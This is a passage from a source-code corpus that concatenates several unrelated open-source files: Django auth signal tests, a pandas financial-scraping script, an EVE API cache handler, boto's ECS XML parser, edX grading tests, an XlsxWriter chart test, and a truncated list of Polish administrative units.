        self.assertIn('***', self.login_failed[0]['credentials']['password'])
        self.assertIn('request', self.login_failed[0])
        # Like this:
        self.client.login(username='testclient', password='password')
        self.assertEqual(len(self.logged_in), 1)
        self.assertEqual(self.logged_in[0].username, 'testclient')
        # Ensure there were no more failures.
        self.assertEqual(len(self.login_failed), 1)

    def test_logout_anonymous(self):
        # The log_out function will still trigger the signal for anonymous
        # users.
        self.client.get('/logout/next_page/')
        self.assertEqual(len(self.logged_out), 1)
        self.assertIsNone(self.logged_out[0])

    def test_logout(self):
        self.client.login(username='testclient', password='password')
        self.client.get('/logout/next_page/')
        self.assertEqual(len(self.logged_out), 1)
        self.assertEqual(self.logged_out[0].username, 'testclient')

    def test_update_last_login(self):
        """Only `last_login` is updated in `update_last_login`"""
        user = self.u3
        old_last_login = user.last_login
        user.username = "This username shouldn't get saved"
        request = RequestFactory().get('/login')
        signals.user_logged_in.send(sender=user.__class__, request=request, user=user)
        user.refresh_from_db()
        # The username change above must not have been persisted.
        self.assertEqual(user.username, 'staff')
        self.assertNotEqual(user.last_login, old_last_login)

    def test_failed_login_without_request(self):
        # authenticate() without a request still sends user_login_failed,
        # with request=None in the payload.
        authenticate(username='testclient', password='bad')
        self.assertIsNone(self.login_failed[0]['request'])

    def test_login_with_custom_user_without_last_login_field(self):
        """
        The user_logged_in signal is only registered if the user model has a
        last_login field.
        """
        last_login_receivers = signals.user_logged_in.receivers
        try:
            signals.user_logged_in.receivers = []
            with self.assertRaises(FieldDoesNotExist):
                MinimalUser._meta.get_field('last_login')
            with self.settings(AUTH_USER_MODEL='auth_tests.MinimalUser'):
                apps.get_app_config('auth').ready()
                self.assertEqual(signals.user_logged_in.receivers, [])
            with self.settings(AUTH_USER_MODEL='auth.User'):
                apps.get_app_config('auth').ready()
                self.assertEqual(len(signals.user_logged_in.receivers), 1)
        finally:
            # Restore the original receivers even if an assertion failed.
            signals.user_logged_in.receivers = last_login_receivers
| bsd-3-clause |
cleesmith/sentdex_scikit_machine_learning_tutorial_for_investing | p06.py | 2 | 1516 | import pandas as pd
import os
import time
from datetime import datetime
# path = "X:/Backups/intraQuarter" # for Windows with X files :)
# if git clone'ed then use relative path,
# assuming you extracted the downloaded zip into this project's folder:
path = "intraQuarter"


def Key_Stats(gather="Total Debt/Equity (mrq)"):
    """Walk intraQuarter/_KeyStats, scrape ``gather`` from each cached
    Yahoo Finance HTML page, and write the collected values to a CSV.

    Args:
        gather: label of the key statistic to extract; also used (with
            punctuation stripped) to derive the output CSV file name.
    """
    statspath = path + '/_KeyStats'
    stock_list = [x[0] for x in os.walk(statspath)]
    # Collect plain dicts and build the DataFrame once at the end:
    # per-row DataFrame.append was quadratic and was removed in pandas 2.0.
    rows = []
    for each_dir in stock_list[1:]:
        each_file = os.listdir(each_dir)
        # ticker = each_dir.split("\\")[1] # Windows only
        # ticker = each_dir.split("/")[1] # this didn't work so do this:
        ticker = os.path.basename(os.path.normpath(each_dir))
        # print(ticker) # uncomment to verify
        for file in each_file:
            date_stamp = datetime.strptime(file, '%Y%m%d%H%M%S.html')
            unix_time = time.mktime(date_stamp.timetuple())
            full_file_path = each_dir + '/' + file
            # Context manager so the handle is closed (the original leaked
            # one open file per parsed page).
            with open(full_file_path, 'r') as fh:
                source = fh.read()
            try:
                value = float(source.split(
                    gather + ':</td><td class="yfnc_tabledata1">')[1].split('</td>')[0])
                rows.append({'Date': date_stamp,
                             'Unix': unix_time,
                             'Ticker': ticker,
                             'DE Ratio': value})
            except (IndexError, ValueError):
                # Page lacks the statistic or the value isn't numeric;
                # skip it (preserves the original best-effort behavior).
                pass

    df = pd.DataFrame(rows, columns=['Date', 'Unix', 'Ticker', 'DE Ratio'])
    save = gather.replace(' ', '').replace(')', '').replace('(', '').replace('/', '') + '.csv'
    print(save)
    df.to_csv(save)


Key_Stats()
nyrocron/eve-wspace | evewspace/API/cache_handler.py | 10 | 1496 | # Eve W-Space
# Copyright 2014 Andrew Austin and contributors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from django.core.cache import cache
from datetime import datetime
import cPickle as pickle
import time
import zlib
import pytz
def store(host, path, params, doc, obj):
    """Store an API document in our cache.

    The entry is keyed on (host, path, params) and expires when
    ``obj.cachedUntil`` (a Unix timestamp) passes.
    """
    # cache.set() overwrites any previous entry under the same key, so no
    # explicit removal of outdated versions is needed.
    cacheKey = "%s%s%s" % (host, path, params)
    cacheTimer = obj.cachedUntil - int(time.time())
    # If cacheTimer is negative or 0 (due to server clock inaccuracy)
    # We will set a default cache timer of 60 seconds
    if cacheTimer <= 0:
        cacheTimer = 60
    # Documents are compressed to keep cache entries small.
    cache.set(hash(cacheKey), zlib.compress(unicode(doc)), cacheTimer)
def retrieve(host, path, params):
    """Return the decompressed API document for (host, path, params).

    Returns None on a cache miss.
    """
    cacheKey = "%s%s%s" % (host, path, params)
    # Fetch once: the previous test-then-read pattern called cache.get()
    # twice, doing double work and racing with expiry between the calls.
    cached = cache.get(hash(cacheKey))
    if cached:
        return zlib.decompress(cached)
    return None
| apache-2.0 |
liaorubei/depot_tools | third_party/boto/ecs/item.py | 89 | 5148 | # Copyright (c) 2010 Chris Moyer http://coredumped.org/
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
import xml.sax
import cgi
from StringIO import StringIO
class ResponseGroup(xml.sax.ContentHandler):
    """A Generic "Response Group", which can
    be anything from the entire list of Items to
    specific response elements within an item"""
    def __init__(self, connection=None, nodename=None):
        """Create a response group rooted at an XML node named `nodename`."""
        self._connection = connection
        self._nodename = nodename
        # Stack of element names between this group's root and the cursor.
        self._nodepath = []
        # Child ResponseGroup currently receiving forwarded SAX events.
        self._curobj = None
        # Accumulates the raw XML seen by this group, for to_xml().
        self._xml = StringIO()
    def __repr__(self):
        return '<%s: %s>' % (self.__class__.__name__, self.__dict__)
    #
    # Attribute Functions
    #
    def get(self, name):
        # Parsed attributes are stored directly on the instance __dict__.
        return self.__dict__.get(name)
    def set(self, name, value):
        self.__dict__[name] = value
    def to_xml(self):
        # Re-wrap the accumulated inner XML in this group's root tag.
        return "<%s>%s</%s>" % (self._nodename, self._xml.getvalue(), self._nodename)
    #
    # XML Parser functions
    #
    def startElement(self, name, attrs, connection):
        self._xml.write("<%s>" % name)
        self._nodepath.append(name)
        if len(self._nodepath) == 1:
            # Direct child of this group: expose it as a nested ResponseGroup.
            obj = ResponseGroup(self._connection)
            self.set(name, obj)
            self._curobj = obj
        elif self._curobj:
            # Deeper descendant: forward the event to the active child.
            self._curobj.startElement(name, attrs, connection)
        return None
    def endElement(self, name, value, connection):
        # Escape the text, then restore "&" — presumably so text that was
        # already entity-escaped is not double-escaped (TODO confirm).
        self._xml.write("%s</%s>" % (cgi.escape(value).replace("&amp;", "&"), name))
        if len(self._nodepath) == 0:
            return
        obj = None
        curval = self.get(name)
        if len(self._nodepath) == 1:
            # Closing a direct child: keep its text unless it would clobber
            # an existing non-empty value with an empty one.
            if value or not curval:
                self.set(name, value)
            if self._curobj:
                self._curobj = None
        #elif len(self._nodepath) == 2:
            #self._curobj = None
        elif self._curobj:
            self._curobj.endElement(name, value, connection)
        self._nodepath.pop()
        return None
class Item(ResponseGroup):
    """One product entry, parsed out of an "Item" response node."""
    def __init__(self, connection=None):
        """Set up a ResponseGroup rooted at an <Item> element."""
        # Direct base-class call: the SAX ContentHandler base is an
        # old-style class, so super() is not usable here.
        ResponseGroup.__init__(self, connection, "Item")
class ItemSet(ResponseGroup):
    """A special ResponseGroup that has built-in paging, and
    only creates new Items on the "Item" tag"""
    def __init__(self, connection, action, params, page=0):
        ResponseGroup.__init__(self, connection, "Items")
        # Items parsed from the current page of results.
        self.objs = []
        # Live iterator over self.objs; reset once a page is exhausted.
        self.iter = None
        self.page = page
        # Request details kept so the next page can be fetched lazily.
        self.action = action
        self.params = params
        # Item currently being parsed, between its start and end tags.
        self.curItem = None
        self.total_results = 0
        self.total_pages = 0
    def startElement(self, name, attrs, connection):
        if name == "Item":
            self.curItem = Item(self._connection)
        elif self.curItem != None:
            # Forward everything inside an <Item> to that Item.
            self.curItem.startElement(name, attrs, connection)
        return None
    def endElement(self, name, value, connection):
        if name == 'TotalResults':
            self.total_results = value
        elif name == 'TotalPages':
            self.total_pages = value
        elif name == "Item":
            # Item finished: record it and fold its XML into our buffer.
            self.objs.append(self.curItem)
            self._xml.write(self.curItem.to_xml())
            self.curItem = None
        elif self.curItem != None:
            self.curItem.endElement(name, value, connection)
        return None
    def next(self):
        """Special paging functionality"""
        # Python 2 iterator protocol; fetches further pages on demand.
        if self.iter == None:
            self.iter = iter(self.objs)
        try:
            return self.iter.next()
        except StopIteration:
            self.iter = None
            self.objs = []
            if int(self.page) < int(self.total_pages):
                # More pages on the server: parse the next one into self,
                # then recurse to yield from the freshly filled objs.
                self.page += 1
                self._connection.get_response(self.action, self.params, self.page, self)
                return self.next()
            else:
                raise
    def __iter__(self):
        return self
    def to_xml(self):
        """Override to first fetch everything"""
        # Draining the iterator pulls every remaining page into self._xml.
        for item in self:
            pass
        return ResponseGroup.to_xml(self)
| bsd-3-clause |
morpheby/levelup-by | lms/djangoapps/open_ended_grading/tests.py | 2 | 13802 | """
Tests for open ended grading interfaces
./manage.py lms --settings test test lms/djangoapps/open_ended_grading
"""
import json
from mock import MagicMock, patch, Mock
from django.core.urlresolvers import reverse
from django.contrib.auth.models import Group, User
from django.conf import settings
from mitxmako.shortcuts import render_to_string
from xmodule.open_ended_grading_classes import peer_grading_service, controller_query_service
from xmodule import peer_grading_module
from xmodule.modulestore.django import modulestore
from xmodule.x_module import ModuleSystem
from xblock.fields import ScopeIds
from open_ended_grading import staff_grading_service, views
from courseware.access import _course_staff_group_name
import logging
log = logging.getLogger(__name__)
from django.test.utils import override_settings
from xmodule.tests import test_util_open_ended
from xmodule.modulestore.tests.django_utils import ModuleStoreTestCase
from xblock.field_data import DictFieldData
from courseware.tests import factories
from courseware.tests.modulestore_config import TEST_DATA_MIXED_MODULESTORE
from courseware.tests.helpers import LoginEnrollmentTestCase, check_for_get_code, check_for_post_code
class EmptyStaffGradingService(object):
    """Stub grading service whose get_problem_list omits 'problem_list'.

    Lets tests verify that the view shows a sensible error when the
    backend response is missing the problem list key.
    """
    def get_problem_list(self, course_id, user_id):
        """Return a JSON response that lacks the 'problem_list' key."""
        response = {'success': True, 'error': 'No problems found.'}
        return json.dumps(response)
@override_settings(MODULESTORE=TEST_DATA_MIXED_MODULESTORE)
class TestStaffGradingService(ModuleStoreTestCase, LoginEnrollmentTestCase):
    '''
    Check that staff grading service proxy works. Basically just checking the
    access control and error handling logic -- all the actual work is on the
    backend.
    '''
    def setUp(self):
        # Two accounts: a plain student (no staff access) and an instructor.
        self.student = 'view@test.com'
        self.instructor = 'view2@test.com'
        self.password = 'foo'
        self.location = 'TestLocation'
        self.create_account('u1', self.student, self.password)
        self.create_account('u2', self.instructor, self.password)
        self.activate_user(self.student)
        self.activate_user(self.instructor)
        self.course_id = "edX/toy/2012_Fall"
        self.toy = modulestore().get_course(self.course_id)
        def make_instructor(course):
            # Staff access is granted via membership in the course staff group.
            group_name = _course_staff_group_name(course.location)
            group = Group.objects.create(name=group_name)
            group.user_set.add(User.objects.get(email=self.instructor))
        make_instructor(self.toy)
        # Keep a handle on the service so tests can check its counters (.cnt).
        self.mock_service = staff_grading_service.staff_grading_service()
        self.logout()
    def test_access(self):
        """
        Make sure only staff have access.
        """
        self.login(self.student, self.password)
        # both get and post should return 404
        for view_name in ('staff_grading_get_next', 'staff_grading_save_grade'):
            url = reverse(view_name, kwargs={'course_id': self.course_id})
            check_for_get_code(self, 404, url)
            check_for_post_code(self, 404, url)
    def test_get_next(self):
        # An instructor should receive a full submission payload.
        self.login(self.instructor, self.password)
        url = reverse('staff_grading_get_next', kwargs={'course_id': self.course_id})
        data = {'location': self.location}
        response = check_for_post_code(self, 200, url, data)
        content = json.loads(response.content)
        self.assertTrue(content['success'])
        self.assertEquals(content['submission_id'], self.mock_service.cnt)
        self.assertIsNotNone(content['submission'])
        self.assertIsNotNone(content['num_graded'])
        self.assertIsNotNone(content['min_for_ml'])
        self.assertIsNotNone(content['num_pending'])
        self.assertIsNotNone(content['prompt'])
        self.assertIsNotNone(content['ml_error_info'])
        self.assertIsNotNone(content['max_score'])
        self.assertIsNotNone(content['rubric'])
    def save_grade_base(self, skip=False):
        # Shared driver for the save-grade tests; `skip` marks the
        # submission as skipped instead of graded.
        self.login(self.instructor, self.password)
        url = reverse('staff_grading_save_grade', kwargs={'course_id': self.course_id})
        data = {'score': '12',
                'feedback': 'great!',
                'submission_id': '123',
                'location': self.location,
                'submission_flagged': "true",
                'rubric_scores[]': ['1', '2']}
        if skip:
            data.update({'skipped': True})
        response = check_for_post_code(self, 200, url, data)
        content = json.loads(response.content)
        self.assertTrue(content['success'], str(content))
        self.assertEquals(content['submission_id'], self.mock_service.cnt)
    def test_save_grade(self):
        self.save_grade_base(skip=False)
    def test_save_grade_skip(self):
        self.save_grade_base(skip=True)
    def test_get_problem_list(self):
        self.login(self.instructor, self.password)
        url = reverse('staff_grading_get_problem_list', kwargs={'course_id': self.course_id})
        data = {}
        response = check_for_post_code(self, 200, url, data)
        content = json.loads(response.content)
        self.assertTrue(content['success'])
        self.assertEqual(content['problem_list'], [])
    @patch('open_ended_grading.staff_grading_service._service', EmptyStaffGradingService())
    def test_get_problem_list_missing(self):
        """
        Test to see if a staff grading response missing a problem list is given the appropriate error.
        Mock the staff grading service to enable the key to be missing.
        """
        # Get a valid user object.
        instructor = User.objects.get(email=self.instructor)
        # Mock a request object.
        request = Mock(
            user=instructor,
        )
        # Get the response and load its content.
        response = json.loads(staff_grading_service.get_problem_list(request, self.course_id).content)
        # A valid response will have an "error" key.
        self.assertTrue('error' in response)
        # Check that the error text is correct.
        self.assertIn("Cannot find", response['error'])
@override_settings(MODULESTORE=TEST_DATA_MIXED_MODULESTORE)
class TestPeerGradingService(ModuleStoreTestCase, LoginEnrollmentTestCase):
    '''
    Check that staff grading service proxy works. Basically just checking the
    access control and error handling logic -- all the actual work is on the
    backend.
    '''
    def setUp(self):
        self.student = 'view@test.com'
        self.instructor = 'view2@test.com'
        self.password = 'foo'
        self.location = 'TestLocation'
        self.create_account('u1', self.student, self.password)
        self.create_account('u2', self.instructor, self.password)
        self.activate_user(self.student)
        self.activate_user(self.instructor)
        self.course_id = "edX/toy/2012_Fall"
        self.toy = modulestore().get_course(self.course_id)
        location = "i4x://edX/toy/peergrading/init"
        field_data = DictFieldData({'data': "<peergrading/>", 'location': location, 'category':'peergrading'})
        self.mock_service = peer_grading_service.MockPeerGradingService()
        # Minimal ModuleSystem wiring needed to instantiate a peer grading
        # module outside of a real courseware request.
        self.system = ModuleSystem(
            ajax_url=location,
            track_function=None,
            get_module=None,
            render_template=render_to_string,
            replace_urls=None,
            xmodule_field_data=lambda d: d._field_data,
            s3_interface=test_util_open_ended.S3_INTERFACE,
            open_ended_grading_interface=test_util_open_ended.OPEN_ENDED_GRADING_INTERFACE,
            mixins=settings.XBLOCK_MIXINS,
        )
        self.descriptor = peer_grading_module.PeerGradingDescriptor(self.system, field_data, ScopeIds(None, None, None, None))
        self.peer_module = self.descriptor.xmodule(self.system)
        # Route all backend calls through the mock grading service.
        self.peer_module.peer_gs = self.mock_service
        self.logout()
    def test_get_next_submission_success(self):
        data = {'location': self.location}
        response = self.peer_module.get_next_submission(data)
        content = response
        self.assertTrue(content['success'])
        self.assertIsNotNone(content['submission_id'])
        self.assertIsNotNone(content['prompt'])
        self.assertIsNotNone(content['submission_key'])
        self.assertIsNotNone(content['max_score'])
    def test_get_next_submission_missing_location(self):
        # Omitting 'location' should produce a key-validation error.
        data = {}
        d = self.peer_module.get_next_submission(data)
        self.assertFalse(d['success'])
        self.assertEqual(d['error'], "Missing required keys: location")
    def test_save_grade_success(self):
        data = {
            'rubric_scores[]': [0, 0],
            'location': self.location,
            'submission_id': 1,
            'submission_key': 'fake key',
            'score': 2,
            'feedback': 'feedback',
            'submission_flagged': 'false',
            'answer_unknown': 'false',
            'rubric_scores_complete' : 'true'
        }
        qdict = MagicMock()
        def fake_get_item(key):
            return data[key]
        # Emulate a Django QueryDict: item access, getlist() and keys().
        qdict.__getitem__.side_effect = fake_get_item
        qdict.getlist = fake_get_item
        qdict.keys = data.keys
        response = self.peer_module.save_grade(qdict)
        self.assertTrue(response['success'])
    def test_save_grade_missing_keys(self):
        data = {}
        d = self.peer_module.save_grade(data)
        self.assertFalse(d['success'])
        self.assertTrue(d['error'].find('Missing required keys:') > -1)
    def test_is_calibrated_success(self):
        data = {'location': self.location}
        response = self.peer_module.is_student_calibrated(data)
        self.assertTrue(response['success'])
        self.assertTrue('calibrated' in response)
    def test_is_calibrated_failure(self):
        data = {}
        response = self.peer_module.is_student_calibrated(data)
        self.assertFalse(response['success'])
        self.assertFalse('calibrated' in response)
    def test_show_calibration_essay_success(self):
        data = {'location': self.location}
        response = self.peer_module.show_calibration_essay(data)
        self.assertTrue(response['success'])
        self.assertIsNotNone(response['submission_id'])
        self.assertIsNotNone(response['prompt'])
        self.assertIsNotNone(response['submission_key'])
        self.assertIsNotNone(response['max_score'])
    def test_show_calibration_essay_missing_key(self):
        data = {}
        response = self.peer_module.show_calibration_essay(data)
        self.assertFalse(response['success'])
        self.assertEqual(response['error'], "Missing required keys: location")
    def test_save_calibration_essay_success(self):
        data = {
            'rubric_scores[]': [0, 0],
            'location': self.location,
            'submission_id': 1,
            'submission_key': 'fake key',
            'score': 2,
            'feedback': 'feedback',
            'submission_flagged': 'false'
        }
        qdict = MagicMock()
        def fake_get_item(key):
            return data[key]
        # Same QueryDict emulation as in test_save_grade_success.
        qdict.__getitem__.side_effect = fake_get_item
        qdict.getlist = fake_get_item
        qdict.keys = data.keys
        response = self.peer_module.save_calibration_essay(qdict)
        self.assertTrue(response['success'])
        self.assertTrue('actual_score' in response)
    def test_save_calibration_essay_missing_keys(self):
        data = {}
        response = self.peer_module.save_calibration_essay(data)
        self.assertFalse(response['success'])
        self.assertTrue(response['error'].find('Missing required keys:') > -1)
        self.assertFalse('actual_score' in response)
@override_settings(MODULESTORE=TEST_DATA_MIXED_MODULESTORE)
class TestPanel(ModuleStoreTestCase, LoginEnrollmentTestCase):
    """Exercise the open ended grading panel views."""
    def setUp(self):
        # The toy/demo courses are preloaded by the test modulestore.
        self.course_name = 'edX/open_ended/2012_Fall'
        self.course = modulestore().get_course(self.course_name)
        self.user = factories.UserFactory()
    def test_open_ended_panel(self):
        """The demo course should contain a reachable peer grading module."""
        # Local renamed from 'peer_grading_module' to avoid shadowing the
        # module imported at file scope.
        found_module, _module = views.find_peer_grading_module(self.course)
        self.assertTrue(found_module)
    @patch('open_ended_grading.views.controller_qs', controller_query_service.MockControllerQueryService(settings.OPEN_ENDED_GRADING_INTERFACE, views.system))
    def test_problem_list(self):
        """The grading controller's problem list should render locally."""
        request = Mock(user=self.user)
        response = views.student_problem_list(request, self.course.id)
        self.assertRegexpMatches(response.content, "Here are a list of open ended problems for this course.")
@override_settings(MODULESTORE=TEST_DATA_MIXED_MODULESTORE)
class TestPeerGradingFound(ModuleStoreTestCase):
    """Verify detection of peer grading modules that cannot be reached."""
    def setUp(self):
        self.course_name = 'edX/open_ended_nopath/2012_Fall'
        self.course = modulestore().get_course(self.course_name)
    def test_peer_grading_nopath(self):
        """
        The open_ended_nopath course contains a peer grading module with no path to it.
        Ensure that the exception is caught.
        """
        was_found, _url = views.find_peer_grading_module(self.course)
        self.assertEqual(was_found, False)
jvrsantacruz/XlsxWriter | xlsxwriter/test/comparison/test_chart_area04.py | 8 | 1523 | ###############################################################################
#
# Tests for XlsxWriter.
#
# Copyright (c), 2013-2015, John McNamara, jmcnamara@cpan.org
#
from ..excel_comparsion_test import ExcelComparisonTest
from ...workbook import Workbook
class TestCompareXLSXFiles(ExcelComparisonTest):
    """Compare an XlsxWriter-produced workbook with one saved by Excel."""
    def setUp(self):
        self.maxDiff = None
        base_name = 'chart_area04.xlsx'
        comparison_dir = 'xlsxwriter/test/comparison/'
        self.got_filename = comparison_dir + '_test_' + base_name
        self.exp_filename = comparison_dir + 'xlsx_files/' + base_name
        self.ignore_files = []
        self.ignore_elements = {'xl/workbook.xml': ['<fileVersion', '<calcPr']}
    def test_create_file(self):
        """Build an area chart with a secondary axis and diff it against Excel."""
        workbook = Workbook(self.got_filename)
        worksheet = workbook.add_worksheet()
        chart = workbook.add_chart({'type': 'area'})
        # Axis ids are pinned so the generated XML matches the reference file.
        chart.axis_ids = [63591168, 63592704]
        chart.axis2_ids = [74921856, 73764224]
        series_data = [
            [1, 2, 3, 4, 5],
            [6, 8, 6, 4, 2],
        ]
        for cell, column in zip(('A1', 'B1'), series_data):
            worksheet.write_column(cell, column)
        chart.add_series({'values': '=Sheet1!$A$1:$A$5'})
        chart.add_series({'values': '=Sheet1!$B$1:$B$5', 'y2_axis': 1})
        worksheet.insert_chart('E9', chart)
        workbook.close()
        self.assertExcelEqual()
| bsd-2-clause |
pwong-mapr/private-hue | desktop/core/ext-py/Django-1.4.5/django/contrib/localflavor/pl/pl_administrativeunits.py | 433 | 13194 | # -*- coding: utf-8 -*-
"""
Polish administrative units as in http://pl.wikipedia.org/wiki/Podzia%C5%82_administracyjny_Polski
"""
ADMINISTRATIVE_UNIT_CHOICES = (
    # Keys (stored values) are kept exactly as before for backward
    # compatibility; only misspelled Polish display names were corrected.
    ('wroclaw', u'Wrocław'),
    ('jeleniagora', u'Jelenia Góra'),
    ('legnica', u'Legnica'),
    ('boleslawiecki', u'bolesławiecki'),
    ('dzierzoniowski', u'dzierżoniowski'),
    ('glogowski', u'głogowski'),
    ('gorowski', u'górowski'),
    ('jaworski', u'jaworski'),
    ('jeleniogorski', u'jeleniogórski'),
    ('kamiennogorski', u'kamiennogórski'),
    ('klodzki', u'kłodzki'),
    ('legnicki', u'legnicki'),
    ('lubanski', u'lubański'),
    ('lubinski', u'lubiński'),
    ('lwowecki', u'lwówecki'),
    ('milicki', u'milicki'),
    ('olesnicki', u'oleśnicki'),
    ('olawski', u'oławski'),
    ('polkowicki', u'polkowicki'),
    ('strzelinski', u'strzeliński'),
    ('sredzki', u'średzki'),
    ('swidnicki', u'świdnicki'),
    ('trzebnicki', u'trzebnicki'),
    ('walbrzyski', u'wałbrzyski'),
    ('wolowski', u'wołowski'),
    ('wroclawski', u'wrocławski'),
    ('zabkowicki', u'ząbkowicki'),
    ('zgorzelecki', u'zgorzelecki'),
    ('zlotoryjski', u'złotoryjski'),
    ('bydgoszcz', u'Bydgoszcz'),
    ('torun', u'Toruń'),
    ('wloclawek', u'Włocławek'),
    ('grudziadz', u'Grudziądz'),
    ('aleksandrowski', u'aleksandrowski'),
    ('brodnicki', u'brodnicki'),
    ('bydgoski', u'bydgoski'),
    ('chelminski', u'chełmiński'),
    ('golubsko-dobrzynski', u'golubsko-dobrzyński'),
    ('grudziadzki', u'grudziądzki'),
    ('inowroclawski', u'inowrocławski'),
    ('lipnowski', u'lipnowski'),
    ('mogilenski', u'mogileński'),
    ('nakielski', u'nakielski'),
    ('radziejowski', u'radziejowski'),
    ('rypinski', u'rypiński'),
    ('sepolenski', u'sępoleński'),
    ('swiecki', u'świecki'),
    ('torunski', u'toruński'),
    ('tucholski', u'tucholski'),
    ('wabrzeski', u'wąbrzeski'),
    ('wloclawski', u'włocławski'),  # fixed: was u'wrocławski' (Włocławek county)
    ('zninski', u'żniński'),  # fixed: was u'źniński' (Żnin county)
    ('lublin', u'Lublin'),
    ('biala-podlaska', u'Biała Podlaska'),
    ('chelm', u'Chełm'),
    ('zamosc', u'Zamość'),
    ('bialski', u'bialski'),
    ('bilgorajski', u'biłgorajski'),
    ('chelmski', u'chełmski'),
    ('hrubieszowski', u'hrubieszowski'),
    ('janowski', u'janowski'),
    ('krasnostawski', u'krasnostawski'),
    ('krasnicki', u'kraśnicki'),
    ('lubartowski', u'lubartowski'),
    ('lubelski', u'lubelski'),
    ('leczynski', u'łęczyński'),
    ('lukowski', u'łukowski'),
    ('opolski', u'opolski'),
    ('parczewski', u'parczewski'),
    ('pulawski', u'puławski'),
    ('radzynski', u'radzyński'),
    ('rycki', u'rycki'),
    ('swidnicki', u'świdnicki'),
    ('tomaszowski', u'tomaszowski'),
    ('wlodawski', u'włodawski'),
    ('zamojski', u'zamojski'),
    ('gorzow-wielkopolski', u'Gorzów Wielkopolski'),
    ('zielona-gora', u'Zielona Góra'),
    ('gorzowski', u'gorzowski'),
    ('krosnienski', u'krośnieński'),
    ('miedzyrzecki', u'międzyrzecki'),
    ('nowosolski', u'nowosolski'),
    ('slubicki', u'słubicki'),
    ('strzelecko-drezdenecki', u'strzelecko-drezdenecki'),
    ('sulecinski', u'sulęciński'),  # fixed: was u'suleńciński' (Sulęcin county)
    ('swiebodzinski', u'świebodziński'),
    ('wschowski', u'wschowski'),
    ('zielonogorski', u'zielonogórski'),
    ('zaganski', u'żagański'),
    ('zarski', u'żarski'),
    ('lodz', u'Łódź'),
    ('piotrkow-trybunalski', u'Piotrków Trybunalski'),
    ('skierniewice', u'Skierniewice'),
    ('belchatowski', u'bełchatowski'),
    ('brzezinski', u'brzeziński'),
    ('kutnowski', u'kutnowski'),
    ('laski', u'łaski'),
    ('leczycki', u'łęczycki'),
    ('lowicki', u'łowicki'),
    # NOTE(review): key contains a space; other slugs use '-'. Changing it
    # would alter stored values, so it is left as-is.
    ('lodzki wschodni', u'łódzki wschodni'),
    ('opoczynski', u'opoczyński'),
    ('pabianicki', u'pabianicki'),
    ('pajeczanski', u'pajęczański'),
    ('piotrkowski', u'piotrkowski'),
    ('poddebicki', u'poddębicki'),
    ('radomszczanski', u'radomszczański'),
    ('rawski', u'rawski'),
    ('sieradzki', u'sieradzki'),
    ('skierniewicki', u'skierniewicki'),
    ('tomaszowski', u'tomaszowski'),
    ('wielunski', u'wieluński'),
    ('wieruszowski', u'wieruszowski'),
    ('zdunskowolski', u'zduńskowolski'),
    ('zgierski', u'zgierski'),
    ('krakow', u'Kraków'),
    ('tarnow', u'Tarnów'),
    ('nowy-sacz', u'Nowy Sącz'),
    ('bochenski', u'bocheński'),
    ('brzeski', u'brzeski'),
    ('chrzanowski', u'chrzanowski'),
    ('dabrowski', u'dąbrowski'),
    ('gorlicki', u'gorlicki'),
    ('krakowski', u'krakowski'),
    ('limanowski', u'limanowski'),
    ('miechowski', u'miechowski'),
    ('myslenicki', u'myślenicki'),
    ('nowosadecki', u'nowosądecki'),
    ('nowotarski', u'nowotarski'),
    ('olkuski', u'olkuski'),
    ('oswiecimski', u'oświęcimski'),
    ('proszowicki', u'proszowicki'),
    ('suski', u'suski'),
    ('tarnowski', u'tarnowski'),
    ('tatrzanski', u'tatrzański'),
    ('wadowicki', u'wadowicki'),
    ('wielicki', u'wielicki'),
    ('warszawa', u'Warszawa'),
    ('ostroleka', u'Ostrołęka'),
    ('plock', u'Płock'),
    ('radom', u'Radom'),
    ('siedlce', u'Siedlce'),
    ('bialobrzeski', u'białobrzeski'),
    ('ciechanowski', u'ciechanowski'),
    ('garwolinski', u'garwoliński'),
    ('gostyninski', u'gostyniński'),
    ('grodziski', u'grodziski'),
    ('grojecki', u'grójecki'),
    ('kozienicki', u'kozienicki'),  # fixed: was u'kozenicki' (Kozienice county)
    ('legionowski', u'legionowski'),
    ('lipski', u'lipski'),
    ('losicki', u'łosicki'),
    ('makowski', u'makowski'),
    ('minski', u'miński'),
    ('mlawski', u'mławski'),
    ('nowodworski', u'nowodworski'),
    ('ostrolecki', u'ostrołęcki'),
    ('ostrowski', u'ostrowski'),
    ('otwocki', u'otwocki'),
    ('piaseczynski', u'piaseczyński'),
    ('plocki', u'płocki'),
    ('plonski', u'płoński'),
    ('pruszkowski', u'pruszkowski'),
    ('przasnyski', u'przasnyski'),
    ('przysuski', u'przysuski'),
    ('pultuski', u'pułtuski'),
    ('radomski', u'radomski'),
    ('siedlecki', u'siedlecki'),
    ('sierpecki', u'sierpecki'),
    ('sochaczewski', u'sochaczewski'),
    ('sokolowski', u'sokołowski'),
    ('szydlowiecki', u'szydłowiecki'),
    ('warszawski-zachodni', u'warszawski zachodni'),
    ('wegrowski', u'węgrowski'),
    ('wolominski', u'wołomiński'),
    ('wyszkowski', u'wyszkowski'),
    ('zwolenski', u'zwoleński'),
    ('zurominski', u'żuromiński'),
    ('zyrardowski', u'żyrardowski'),
    ('opole', u'Opole'),
    ('brzeski', u'brzeski'),
